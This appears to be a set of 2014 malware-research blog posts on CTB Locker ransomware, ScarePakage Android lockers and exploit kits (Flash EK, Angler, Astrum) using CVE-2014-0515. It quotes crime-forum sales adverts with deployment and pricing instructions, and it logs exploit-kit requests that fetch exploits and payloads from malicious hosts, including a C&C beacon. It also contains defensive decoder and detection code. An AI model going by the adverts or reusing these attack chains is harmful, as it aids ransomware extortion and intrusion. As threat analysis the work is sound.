• 8. The server monitors bitcoin transactions for incoming money. As soon as the transaction is fully confirmed, the secret key is computed and sent to the bot. If the code was entered manually, the user is given a small exe decryptor with the key hardcoded, which can only fix his own computer. The decryptor is 30 KB; it will not load the server's channel or the TOR nodes.
• 9. The bot decrypts all files and deletes itself.
• 10. After the transaction is verified, money from the local wallet is withdrawn to the main bitcoin address. If the server is lost, the money is not lost.
Profit from the locker depends directly on the traffic quality. You can set an arbitrary unlock price depending on the region of your traffic.
For US, CA and EU the recommended price is 0.5 BTC ($320), for other regions 0.25 BTC ($160).

How to install and start working with the locker.
• 1. Set up a VDS with Windows 7/2003/2008/2012. At least 30 GB of free space. Recommended disk including the OS itself: 60-100 GB; no high requirements on memory and CPU.
• 2. Run the installer. Specify the installation folder and the base price. The installer itself installs bitcoin, tor and its own server. During installation it generates all keys, domains and addresses and configures all the software.
• 3. After installation you get a fully working server, and a builder appears in the relevant folder. It creates locker instances with the affiliate number, the server's public key and its address hardcoded. Note that the initial bitcoin synchronization can take up to a day. Payment transactions will not be visible until synchronization finishes. Everything else will work.
• 4. The finished locker instance can be crypted and distributed.
• 5. The server writes logs with information on installs and payments; they can be parsed to compute affiliate payouts. Keep in mind that the first check-in happens when encryption finishes, so it can lag the install by several hours. Fake installs (e.g. a system rollback after installation, or multiple installs on one machine) will not generate a check-in. An install check-in to the customer's server for traffic accounting is possible (may reduce the hit rate).
The locker costs $3000 and includes one month of free support.
Extending support costs only $300 per month. You can freely use the system after support ends, launch new servers, generate lockers. You will only be limited in updates.
For $3000 you get a ready "turnkey" system; it needs no configuration or further work. You don't have to pay anyone a cut, it is personally yours. You can run many different servers and lockers.
You can start loads immediately after installation.

An affiliate scheme without large investments is possible. Contact me on jabber, we'll discuss.


Promotion for the opening of the service.
The first buyer gets the locker with a 50% discount, for only $1500.
For the promotion, a long-standing registration on the forum and posting a review are mandatory.


Purchase procedure.
• 1. Write on jabber. OTR is mandatory.
• 2. Agree on a guarantor or escrow service.
• 3. Provide your bitcoin address. Generate the address in a clean wallet on a separate machine so it cannot be linked to your previous transactions. This address will be hardcoded in the server as the recipient of all earned money. As the buyer you can set up the server an unlimited number of times with different keys and different domains, but you can only withdraw money to a single address. Do not buy the product from random people, your money will go to them.
• 4. Pay the price to the guarantor.
• 5. Receive the installer package, install it on a Windows 7/2003/2008/2012 VDS and test the whole system for 72 hours. Do not run the locker on the server!
• 6. The locker can be tested locally in a VM, or you can start loading right away. A FUD crypt from any service is mandatory for loads.
• 7. Report the successful test to the guarantor.
Screens:



jabber: tapkin@jabbim.cz
------------------------------------------

He later mentioned (translated from Russian):
------------------------------------------
On 27.06.2014 at 23:59 UTC sales of the locker will be stopped. Everyone who has bought or buys the locker will receive updates. New customers will only be able to join the affiliate program.
------------------------------------------

There are multiple instances in the wild. As advertised, some show two languages, some only English.

Here you can see it dropped as second stage after an Angler EK payload:

Critroni delivered as Second Stage - 2014-07-18
Angler EK payload : Spambot it seems.
079bf937d5020ca77ff97a5318414f07
2nd Stage Payload : Critroni.A
e89f09fdded777ceba6412d55ce9d3bc

As advertised, encryption occurs without any connection.

Encrypted documents
ctbl extension
Some file accesses captured by Cuckoo:

Critroni blindly tries to open all mounted drives


CTB Locker/Critroni - Start (English)
(we can see the changed wallpaper in background)
The View button shows you this:

Ctbl - List of encrypted document


CTB Locker/Critroni - Start (Russian)
(we can see the wallpaper in background)
CTB Locker/Critroni - Connecting (English)
CTB Locker/Critroni - Connecting (Russian)

Connection failed: offline mode available.

Critroni - Offline Mode.

CTB Locker - Payment
1PAVxqYtWD1RBAjE5voSDnUSefGGUvCwpm
CTB locker Payment (a little more expensive)
12UrsknT8hqYGpi8NToS2GWCWaLKtR2UXn
(it's in fact > $200)
On the one from today, as second stage of an Angler EK, we can see that the BTC to USD conversion is off.

0.04 BTC is in fact close to 30 USD
1N3qTaZsUqU2owUVjmijVyHB4uiid2JoXd



CTB locker (Payment in Russian)
If you don't have bitcoins :

CTB Locker - Exchange
The Russian one is slightly different:

CTB Locker - Exchange (Russian)
When you click on Open List :

wiki page from en.bitcoin.it is opened.


Time Expired ?

Time Expired....one last chance.
In "my Documents"
Added in my Documents by Critroni.A
The wallpaper, the DecryptAll and list of encrypted documents


Wallpaper of one Critroni/CTB locker
html file stored in my documents
(the one we see when we select view on first screen)

Decrypt All
On tor
On tor after adding the public key :
1JXMiCkbrPiDWxoZ8oJ9yQZutHoaGQtXCF
Still within the time period. Offline for that one (the conversion rate is correct on the web UI; it was not in the locker)
12UrsknT8hqYGpi8NToS2GWCWaLKtR2UXn
It seems to be a strong, well-thought-out piece of malware.

Files: Critroni_2014-07-18

A ScarePakage variant is targeting more countries : impersonating Europol and AFP

(image from GadgetMaxim.com)


On July 16th Lookout wrote about a new "police ransomware" on Android. They named it ScarePakage (aliases: Eset: Android/Locker.B, Kaspersky: Trojan-Ransom.AndroidOS.Aples.a).

It (or a variant? this one seems Norton-focused) has been advertised on underground forums since the beginning of July as "Android Locker" by the seller of a fork of the Titan Browlock System.

ScarePakage advertised as "Android Locker" on underground - 2014-07-06
Text of the advert (translated from Russian):
------------------------------------------
Android Locker

We developed our own Android locker product.

Features:
- imitation of an illegal content scanner (Hello Norton!)
- "hard" installation; the application cannot be removed even via safe mode
- blocks any user actions/applications/activity
- encryption/decryption of files on the SD card, if the device has one
- "listens" to all available signals on the device, intercepts them and starts the application on each of them
- tries to "kill" any process at startup
- survives reboot
- option to unlock or permanently lock the device after a voucher is entered
- convenient admin panel
- web landing page included

The main goal is collecting MoneyPak vouchers; the software is tailored to US Android traffic,
the application is not adapted to other countries.

Screens

Important: I don't crypt the apk files and I don't sell the sources.
I reserve the right to refuse a sale without explanation.
A rebuild to another domain is free if your previous domain got burned.
I don't give out the apk for testing (well, I do, but not to everybody): there are plenty of hobbyist enthusiasts.
Payment strictly via guarantor or prepayment.

Price $2000, no haggling.
After purchase you get the web landing page and the apk file.
All that's left for you is to send traffic and wait for the vouchers.

knsant@exploit.im - OTR
------------------------------------------

Later update: the seller provided some numbers (translated from Russian):
------------------------------------------
Can you source Android traffic?
I invite a few people to work with our software.
The conversion is on fire.

Approximate conversion figures:

Download apk: 89690
Launch apk: 1379
All vouchers: 76
Valid vouchers: 54

~$9k

Accepting from 50k traffic per day.
------------------------------------------

And on the 16th he wrote about new countries targeted.

knsant announcing that DE, ES, FR and AU designs were now available
2014-07-16
------------------------------------------

I spotted a "badvert" yesterday on Spankwire (a big porn site: Alexa rank 500 in the US, 800 worldwide) redirecting to a Browlock hidden behind Cloudflare (after a hop through a Keitaro TDS on 94.102.48.63).


The Browlock showed exactly the same design as the one featured in that post, Titan Browlock System, so it is also advertised by knsant.

Landing on this badvert with Android from at least FR, ES and DE would prompt you with a virus alert (hidden behind Cloudflare).

Popup alert you could get while browsing Spankwire
with an Android-powered device and Chrome from France
Then a file named Norton_Internet_Security.apk is downloaded.

Launching it :



Impersonates Norton Internet Security


On launch : fake Scan
After the fake scan it tries to get "device administrator" rights
(US version)
I spotted 5 different APKs on the server (which perfectly match what we saw in the advert):
AU - d6c6bc0dc803f7891b9db745c24de541
DE - 06c7a02d49b97930fb9c696cde1350d1
ES - d21e1c0f992ed70c6881c1f31c7a555a
FR - e13523d97e2390ca4529abf06ebe01ee
US - 28726f772f6b4b63fb40696a28afafc9

One country, one APK... the coder should really take a look at "Localizing with Resources".

ScarePakage - DE - 2014-08-05




ScarePakage - FR - 2014-08-05


ScarePakage - ES - 2014-08-05

ScarePakage - AU - 2014-08-05
ScarePakage - US - 2014-08-05

The locking feature works far better than in Koler.

C&C

verify-terms\.com/admcp/api.php
(behind Cloudflare)
Shares infrastructure with the Titan Browlock.



Files : ScarePakage_2014-08-06.zip (5 apk)

Read More:
ScarePakage – Fake FBI RansomLocker - 2014-07-24 - Darien Huss - Emerging Threats
U.S. targeted by coercive mobile ransomware impersonating the FBI - 2014-07-16 -  Meghan Kelly  - Lookout

CVE-2014-0515 (Flash 13.0.0.182 and earlier) integrating Exploit Kits



Discovered by Kaspersky in April in a watering hole attack, used soon after in an operation targeting banking information in Japan/Korea (Symantec), on Exploit-DB at the beginning of May, then in malvertising tied to Brazil 2014 (SpiderLabs), the code targeting CVE-2014-0515 (Flash 13.0.0.182 and earlier) has now found its way into exploit kits. I spotted it on 2014-06-05 in the CottonCastle exploit kit (blog post coming). Brad spotted it in Flash EK.

CottonCastle EK:

CVE-2014-0515 exploit in CottonCastle 2014-06-05
See Meet CottonCastle EK (confirmation credit for this CVE goes to Timo Hirvonen)

Flash EK: 2014-06-06 (I decided to use the coder's name)

The Flash EK coder announced the new exploit on an underground forum on 2014-06-05 (translated from Russian):

"New exploits added. The hit rate has gone up significantly. With our VPS and domains: $350 a week. With yours: $250. Bitcoins or Paymer cheque. I don't understand English. We don't accept traffic from the CIS."

The hit rate increased by up to 45% over its pre-CVE-2014-0515 value.

CVE-2014-0515 as spotted by Brad in Flash EK
2014-06-06
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/allow.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/js/pd.php?id=6376652d323031342d303531352e636f6d  (6376652d323031342d303531352e636f6d is the referer in hex)
200 OK (text/html) http://pastebin.com/HdVf799r

Flash part of the JS detect in Flash EK
2014-06-06


POST http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/json.php
200 OK (text/html) http://pastebin.com/uhTTybKH


POST data to json.php
Flash EK 2014-06-06
After unescape and hex2text : http://pastebin.com/4xZRjJLS
And after one more hex2text : http://pastebin.com/0F9Z2tiW

json.php after multiple hex2bin  Flash EK 2014-06-06


GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/msie.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash2014.php
200 OK (text/html) http://pastebin.com/mqXeun1g



GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash0515.php
200 OK (text/html) http://pastebin.com/L6NYY0iW

After some deobfuscation (unescape, hex2text)  : http://pastebin.com/TjMyS6YW
After one more hex2text : http://pastebin.com/SVGS4yhD

After 3 hex2text : 0515php in Flash EK 2014-06-06
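The unescape / hex2text peeling applied above (the hex-encoded referer in pd.php, the nested hex layers of json.php and flash0515.php) is easy to automate. The following Python decoder is an added example, not the author's tooling or anything shipped with the kit: it strips alternating %xx-escape and hex layers until neither applies. The 90% printable threshold that stops it from "decoding" real text that happens to be hex-shaped, and the `wrap` fixture used to build a three-layer sample, are my assumptions; the referer value is the one from the pd.php request above.

```python
import re
from urllib.parse import unquote

HEX_RUN = re.compile(r"^(?:[0-9a-fA-F]{2})+$")


def hex2text(s):
    """Decode an even-length hex string; return None if it is not hex or
    decodes to mostly non-printable bytes (so real text is not over-decoded)."""
    s = s.strip()
    if not HEX_RUN.match(s):
        return None
    text = bytes.fromhex(s).decode("latin-1")
    printable = sum(1 for ch in text if ch.isprintable() or ch in "\r\n\t")
    return text if printable >= 0.9 * len(text) else None  # assumed threshold


def peel(blob, max_layers=10):
    """Strip alternating %xx-escape and hex layers until neither applies.
    Returns (innermost text, list of steps applied in order)."""
    steps, cur = [], blob
    for _ in range(max_layers):
        if "%" in cur and unquote(cur) != cur:
            cur = unquote(cur)
            steps.append("unescape")
        else:
            inner = hex2text(cur)
            if inner is None:
                break
            cur = inner
            steps.append("hex2text")
    return cur, steps


def wrap(text):
    """Constructed fixture (not from a real landing): hex-encode twice, then
    %-escape, mirroring the unescape -> hex2text -> hex2text order seen above."""
    layer = text.encode("latin-1").hex().encode().hex()
    return "".join("%%%02X" % b for b in layer.encode())


if __name__ == "__main__":
    # The pd.php id parameter from the Flash EK capture above.
    print(hex2text("6376652d323031342d303531352e636f6d"))
    print(peel(wrap("eval(x)")))
```

Run on the pastebin dumps referenced above, `peel` gives the same result as the manual passes; the step list tells you how many layers a given kit revision stacks, which is a cheap fingerprint to track across updates.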



GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash) c49057333ebe34638e7908b43bd23f6c

CVE-2014-0515, DoSWF-protected (I won't try to go further).


GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/loadfla0515.php?id=4
200 OK (application/octet-stream)  bde9e91d8a9e19a45c9ebd44393c0194  Glupteba (Thanks Marc-Étienne Léveillé from Eset for identification. MS flagging it as Carberp made me wonder)

Files : 2014-06-06_CVE-2014-0515.zip
You'll find the pcap and additional data on Malware-Traffic-Analysis.

Sweet Orange :
Spotted by Brad on the 12th

CVE-2014-0515 successful pass in Sweet Orange
GET http://img.blueprint-legal .com:16122/systems/mysql/fedora.php?database=3
200 OK (text/html)

GET http://img.blueprint-legal .com:16122/systems/mysql/hxwXHAp
200 OK (application/x-shockwave-flash) 25844d337d3ee13ec411100cb2d2baf1

CVE-2014-0515 in Sweet Orange


GET http://img.lawandmarket .org:16122/cars.php?play=268
200 OK (application/octet-stream) d35d337ff7598bd6dc20c24e3be735bc (Qbot as usual for this user)

Files :Fiddler/Payload/Flash

Nuclear Pack:
2014-06-15
The exploit is inside (for instance: 444d411a353f6bd8209f91555dfd713b).


2014-06-18
After multiple tries without getting infected through this exploit on Flash 13.0.0.182, I finally got a "successful" pass (thanks to Will Metcalf for the referer).

CVE-2014-0515 positive pass in Nuclear Pack


GET http://f42cb2bfvhf.venueat.gcwsa .org/
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.htm
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.swf
200 OK (application/x-shockwave-flash) f95006970f34a6ca5bcd0b32b92dd48d

GET http://737570439-1.venueat.gcwsa .org/f/1403061420/7
200 OK (application/octet-stream) aa73557aa6b01045afe1b8b6a4aa0934 (Andromeda v09 rc4: 073e329fc4caff518ffb207eb3ac5859 - calling testotds.mcdir .ru - 91.194.254.180 )

Files : Fiddler/Payload/Flash

Angler EK:
2014-07-03
Modification spotted by EKWatcher. Exploit identification by Kaspersky.

CVE-2014-0515 successful path in Angler EK
2014-07-03
GET http://reenslavementbuchungsbuero.izyday .com:5900/o0pmoexhbv.php
200 OK (text/html) Landing (Pastebin)

Contains some AV detection (Kaspersky and Trend Micro):

AV detection
( Function0 
http://pastebin.com/hjH8ijuA )


SilverLight /Flash trigger

Modification spotted by EKWatcher
( Function1 : http://pastebin.com/H2DdDeVf )


And an impossible path:

Impossible Path
( Function1 : http://pastebin.com/H2DdDeVf )

[OT] Silverlight Calls :  Function2  http://pastebin.com/Vd869rDX [/OT]

Flash Call (function3)

Flash Calls
Function3  http://pastebin.com/maY5Wz1X
 [OT]PluginDetect/Java calls : Function 4 http://pastebin.com/VbUsu2pv [/OT]



GET http://reenslavementbuchungsbuero.izyday .com:5900/9C52KmONbd2yuWAu5h6nA_qVLxrslXn927DBuIPEo2Pog7IUkVQt04rmOPmow_rb
200 OK (application/x-shockwave-flash) 85db431821dfec5d5d404b839c98d333


After decryption (Kaspersky's work)
Piece of CVE-2014-0515 in decrypted flash from Angler EK

GET http://reenslavementbuchungsbuero.izyday .com:5900/sVUXbUAgdGMB6xjbl128LfXoLjZ37iyD34sGV24h7-9RKadZHRBKohwCwk5FHCfc
200 OK (application/octet-stream) (Reveton Ransomware)

Files :
 Fiddler/Flash

Styx : 2014-08-22

Update coming shortly.


Read more :
CVE-2014-0515 exploit from FlashPack EK - Brad - Malware-Traffic-Analysis
CVE-2014-0515 Goes to Brazil for World Cup 2014 - Arseny Levin - SpiderLabs - 2014-06-03
Recent Exploit for Adobe Flash Vulnerability Targeting Users in Japan for Financial Information - Joji Hamada - Symantec - 2014-05-30

Angler EK : now capable of "fileless" infection (memory malware)

Matrix - Agent Jackson avoiding bullets



(First edition: I asked for help to study this; hopefully more technical details to come soon)

A few days ago I spotted a new pattern in some Angler EK threads:


New pattern in a Vawtrak Thread from Angler EK
Fired : CVE-2013-2551 - 2014-08-28


New pattern in another Vawtrak Thread from Angler EK
Fired : CVE-2014-0515 - 2014-08-29
GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive



Wondering what it was and going over different infection paths, I spotted only one thread without this "new" count?b. [Note: on 2014-08-31 count?b appeared on that thread too]

Angler EK - 2014-08-28
"Memory Malware" thread


The exploits' hashes were the same as on all other threads, but my usual tools were not able to gather the payload, and what surprised me more is that HIPS (like Faronics Anti-Executable) were bypassed (note: I tried Malwarebytes Anti-Exploit and it was able to spot the ROP and stack pivoting).
I spent some time figuring out what was happening here:

Angler EK is now able to infect a host without writing the malware to the drive: it is injected directly into the process running the exploited plugin.

Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer
2nd stage drop: 275c5f650261e80d864faf7cc6b70774, injecting itself into explorer.exe and
then fetching Necurs from the same C&C (e.g.: be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28, b0e3e860a2dc62cb40fd6ef897ad592b - 2014-08-29, 5830dfde30873176d05604677bab6bd9 - 2014-08-30)


Malware callback over HTTPS to koqpisea.in:
217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM

Call for 2nd Stage payload looks like :

POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache

{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}


This feature opens a wide range of possibilities. Aside from being a powerful way to bypass AV and an ideal fit for one-time stealers or loaders (Pony, Jolly Roger, Andromeda, Smoke Bot, etc.), it also allows a detailed check of the infected host before getting noisier and writing anything to disk. It also makes the dropper hard to grab (you have to carve it from memory or from the recorded traffic and then decode it). This is a powerful move for the attack side.
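Since nothing hits the disk, the check-in above is the artefact a defender is most likely to see, once TLS is terminated by a proxy or the body is carved from memory. The following detection is an added example (not the author's tooling): it matches POST bodies on the structure of the JSON beacon (integer protocolVersion and buildId, a 16-hex-character id, a non-empty list of typed tags) rather than on the host name, which rotates. It assumes this field set is stable across builds; the two non-matching records are constructed.

```python
import json
import re

# Structural match for the loader's first check-in. Assumption: the field set
# seen in the 2014-08 captures is stable across builds.
ID_RE = re.compile(r"^[0-9a-f]{16}$")
REQUIRED = {"protocolVersion", "buildId", "id", "tags"}


def is_memory_beacon(body):
    """Return True when a POST body has the shape of the in-memory loader's check-in."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if not isinstance(doc, dict) or not REQUIRED <= set(doc):
        return False
    # bool is a subclass of int in Python; reject it explicitly.
    if not all(isinstance(doc[k], int) and not isinstance(doc[k], bool)
               for k in ("protocolVersion", "buildId")):
        return False
    if not isinstance(doc["id"], str) or not ID_RE.match(doc["id"]):
        return False
    tags = doc["tags"]
    return (isinstance(tags, list) and len(tags) > 0
            and all(isinstance(t, dict) and "type" in t for t in tags))


def scan_posts(records):
    """records: iterable of (host, body) pairs, e.g. extracted from a proxy log or a
    TLS-intercepted pcap. Returns (host, buildId, bot id) for each hit, so the
    buildId can be tracked across campaigns and the id used to pivot in other logs."""
    hits = []
    for host, body in records:
        if is_memory_beacon(body):
            doc = json.loads(body)
            hits.append((host, doc["buildId"], doc["id"]))
    return hits


# Constructed sample records: the first body is the one captured above; the
# other two are benign look-alikes that must not match.
SAMPLE_RECORDS = [
    ("koqpisea.in",
     '{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2",'
     '"tags":[{"type":"dll","64bit":0}]}'),
    ("api.example.test",                                # constructed benign JSON
     '{"protocolVersion":1,"buildId":12,"id":"session-4711","tags":[]}'),
    ("cdn.example.test", "<html>not json</html>"),      # constructed non-JSON body
]

if __name__ == "__main__":
    for hit in scan_posts(SAMPLE_RECORDS):
        print("memory-loader check-in: host=%s buildId=%d id=%s" % hit)
```

The check is deliberately strict on types (a bool would satisfy `isinstance(x, int)`) and on the 16-hex id, so generic JSON APIs that happen to carry a `tags` array do not trip it; pair it with the process-level signal (plugin-container, IE or explorer.exe originating TLS to a fresh domain) for confirmation.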


Additional illustrations:

Injected plugin-container calling C&C after successful "memory malware" infection
via Silverlight on Firefox and Windows 7
2014-08-30



Image : Courtesy of Will Metcalf from Emerging Threats
Java calling payload then "Memory payload" activity captured by his Cuckoo instance
2014-08-28
Hopefully more to come soon.

Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advice.


Files:
 AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud)

 If you want to play with Volatility or whatever, here is a memory dump (Mega) of a VM taken while IE was injected and calling the C&C (IE PID: 860)

Capture of Fiddler just before pausing the VM
2014-08-30



Read More: 
The Hunt for Memory Malware - 2013-11-06 - Albert Fruz
In-Memory Execution of an Executable - Amit Malik  - SecurityXploded




Say Hello to Astrum EK

Artist’s impression shows the structure of the Milky Way
NASA/JPL-Caltech/ESO/R. Hurt

I was chasing something else (the Sweet Orange thread of the Kovter ad-fraud operation; Kovter has not been a ransomware anymore since at least March 2014) when I received bullets from an undocumented "weapon": an exploit kit that seems to be private (for now?) and which, judging by the infection path (an Adxpansion badvert on a porn website leading to an https goo.gl link to the landing), is in use by a group that was sending traffic to the Reveton team's EK threads (so via Cool, then Angler EK):

Say Hello to Astrum EK

Astrum EK 2014-09-06 - Real Name (not chosen)
(At a quick look at the URI pattern it may seem a little Angler-ish... but it's not.)
Astrum serves a landing only once per IP and also denies connections from Tor and (at least) Russia.
The lifetime of a landing seems a little longer than on Angler or Nuclear Pack, but where you usually need to fake a referer to avoid being rejected, with Astrum it is the opposite: show a referer and you get ignored and IP-banned. Firefox, Chrome and Opera are ignored too (and I guess they are filtered out upstream anyway).
A quick search suggests it has been in use since at least 2014-08-15.

Now let's take a look at the bullets and the ballistics.

CVE-2014-0515 - CVE-2013-0634 (Flash) :

These days it's the most successfully targeted vulnerability in exploit kits, followed by CVE-2013-2551.

CVE-2014-0515 successful path in Astrum EK
2014-09-06

GET http://static.yarkiy-mir .org/duf5ibqshp.html
200 OK (text/html)

Piece of Astrum's Landing 2014-09-06
http://pastebin.com/Jc5k0kvi
JsBeautified : http://pastebin.com/gvjskkG2
Obfuscation in use, as described by EKWatcher:
an array of modified-Base64 strings, each XORed with a different byte and then inserted (in random order) into the JS later. The Base64 uses the alphabet "A-Za-z0-9-:" instead of "A-Za-z0-9+/".
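A decoder for that string scheme, added here as an example (it is not Astrum's own JavaScript, and the sample string it decodes is constructed for the demo rather than lifted from a landing). It maps the "-:" alphabet back onto the standard "+/" one, restores padding, XORs with the per-string key byte, and includes a heuristic brute-force of the key byte for the case where the key is not obvious in the script:

```python
"""Decoder for the Astrum-style string obfuscation: custom-alphabet Base64
("A-Za-z0-9-:" instead of "A-Za-z0-9+/") followed by a single XOR byte that
differs per string. Added example, not Astrum's own code; SAMPLE_* values
below are constructed for the demo."""
import base64
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
ASTRUM_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "-:"


def custom_b64decode(encoded: str, alphabet: str = ASTRUM_ALPHABET) -> bytes:
    """Map the custom alphabet back onto the standard one, restore padding, decode."""
    std = encoded.translate(str.maketrans(alphabet, STD_ALPHABET))
    std += "=" * (-len(std) % 4)          # landings usually strip the '=' padding
    return base64.b64decode(std)


def custom_b64encode(data: bytes, alphabet: str = ASTRUM_ALPHABET) -> str:
    """Inverse of custom_b64decode; used here only to build the sample."""
    std = base64.b64encode(data).decode().rstrip("=")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


def xor_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def decode_string(encoded: str, key: int) -> str:
    """Decode one array entry when its XOR byte is known (read it from the script)."""
    return xor_byte(custom_b64decode(encoded), key).decode("latin-1")


def guess_key(encoded: str) -> int:
    """Brute-force the XOR byte when it is not obvious from the script.
    Heuristic: the right key yields mostly lowercase letters and spaces,
    a wrong one flips case or turns spaces into punctuation. Confirm the
    result against the script's own key material before trusting it."""
    raw = custom_b64decode(encoded)

    def score(candidate: bytes) -> int:
        return sum(3 if b == 0x20 else 1 if 0x61 <= b <= 0x7A else 0 for b in candidate)

    return max(range(256), key=lambda k: score(xor_byte(raw, k)))


# --- constructed sample (not from a real landing) ---------------------------
SAMPLE_PLAIN = 'var x = new ActiveXObject("Microsoft.XMLDOM");'
SAMPLE_KEY = 0x5A
SAMPLE_ENCODED = custom_b64encode(xor_byte(SAMPLE_PLAIN.encode(), SAMPLE_KEY))

if __name__ == "__main__":
    print(decode_string(SAMPLE_ENCODED, SAMPLE_KEY))
    print(hex(guess_key(SAMPLE_ENCODED)))
```

Feed it each element of the landing's string array together with the byte the script XORs it with; the brute-force path is only a fallback and can be fooled by very short or non-ASCII strings.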

After deobfuscating the "div" value via the function t (using Malzilla, for instance) we get this:

There are sweet pieces of code like these, showing they had researchers/bots etc. in mind while writing it:
On landing load, the script tries to catch debugging tools
(even Phantom...)



and also checks via loadXML whether obvious researcher tools are running or whether it's inside a VM.
check for Kaspersky BHO

And here is the data that will be posted:

Quick sum-up of the data that will be encoded and posted in the next call.
Comments are obviously not in the original code.


POST  http://static.yarkiy-mir .org/IVmTAccT_rdKYvlrrCSb3UJl-G-gc5uJSzOmaP8jldlPMKNo_iuSh1J_qjr5Ot7fTg..
200 OK (text/html)  CVE-2013-2551  and creation of the flash object.

Posted data (as Neutrino was doing):

Which before encoding should look like :

Data sent to the Exploit kit on second call 

Astrum - 2014-09-06
Piece of the Post Call reply.
The obfuscation in use is the same as in the landing.
Once decoded here is the Flash insertion :
Astrum - Inserting the flash element.
http://pastebin.com/GYehkmaC

GET http://static.yarkiy-mir .org/kZThMKU15rv6r4tazgKD0fKoil7CVYOF-_7UWZ0FjdX__dFZnA2Ki-Ky2AWYHMbT_g..
200 OK (application/x-shockwave-flash) 3fb2c3750d51268781fa608a42c3e4d7 CVE-2014-0515 & CVE-2013-0634 (thanks to Arseny Levin (Spiderlabs) for the help)

GET http://static.yarkiy-mir .org/CjJXSImjvethCT0i4pTYgWkOPCbuw9jVYFhiIbGT1oVkW2chsJvR23kUbn27ip2DZQ..
200 OK (application/octet-stream) Once Decoded: 9d9eb3ceffd6596ebdf7fc9387cd5cb1 - Reveton

XORed payload. Key: 98EB68248A2815474CFE8902C0603770
I haven't checked that deeply yet, but it seems you get a unique XOR key for each pass.
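The 32 hex characters above are a 16-byte key that repeats over the whole file. Here is an added example (not Astrum's code) of decoding such a payload, checking that the result is a PE, and recovering the key when it was not captured, by assuming the decoded file starts with the usual DOS header bytes of an MS-linked executable. The key value and "payload" below are constructed for the demo (the key happens to be the one quoted above, the file is a minimal fake PE, not Reveton):

```python
"""Repeating-key XOR as used on the payloads served by Astrum (16-byte key,
given as 32 hex chars). Added example, not the exploit kit's own code.
SAMPLE_* values are constructed; COMMON_DOS_HEADER is an assumption about
typical PE files, not something the post states."""
import struct


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with key repeated; symmetric, so it both encodes and decodes."""
    klen = len(key)
    return bytes(b ^ key[i % klen] for i, b in enumerate(data))


def decode_payload(blob: bytes, key_hex: str) -> bytes:
    return xor_repeating(blob, bytes.fromhex(key_hex))


def looks_like_pe(data: bytes) -> bool:
    """Sanity check after decoding: 'MZ' at 0 and 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# First 16 bytes of a typical MS-linker PE (DOS header). Assumption used for
# known-plaintext key recovery; not every PE starts this way.
COMMON_DOS_HEADER = bytes.fromhex("4d5a90000300000004000000ffff0000")


def recover_key(blob: bytes, known_prefix: bytes = COMMON_DOS_HEADER, key_len: int = 16) -> str:
    """ciphertext XOR expected-plaintext over the first key_len bytes gives the
    key. Only valid if the key length and the guessed prefix are right, so
    always validate the decoded result with looks_like_pe()."""
    if len(known_prefix) < key_len or len(blob) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext and ciphertext")
    key = bytes(c ^ p for c, p in zip(blob[:key_len], known_prefix[:key_len]))
    return key.hex().upper()


# --- constructed sample (a minimal fake PE, not a real payload) --------------
def build_fake_pe() -> bytes:
    hdr = bytearray(COMMON_DOS_HEADER + b"\x00" * (0x40 - 16))
    struct.pack_into("<I", hdr, 0x3C, 0x40)          # e_lfanew right after DOS header
    return bytes(hdr) + b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 18 + b"constructed body"


SAMPLE_KEY_HEX = "98EB68248A2815474CFE8902C0603770"
SAMPLE_PE = build_fake_pe()
SAMPLE_BLOB = xor_repeating(SAMPLE_PE, bytes.fromhex(SAMPLE_KEY_HEX))

if __name__ == "__main__":
    print(looks_like_pe(decode_payload(SAMPLE_BLOB, SAMPLE_KEY_HEX)))
    print(recover_key(SAMPLE_BLOB))
```

On a real capture, run recover_key() on the octet-stream body and then looks_like_pe() on the decoded bytes; if the check fails, the key length or the assumed header is wrong for that sample.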


CVE-2013-0074/3896 (Silverlight) :


Astrum EK -  2014-09-06
Silverlight Successful path



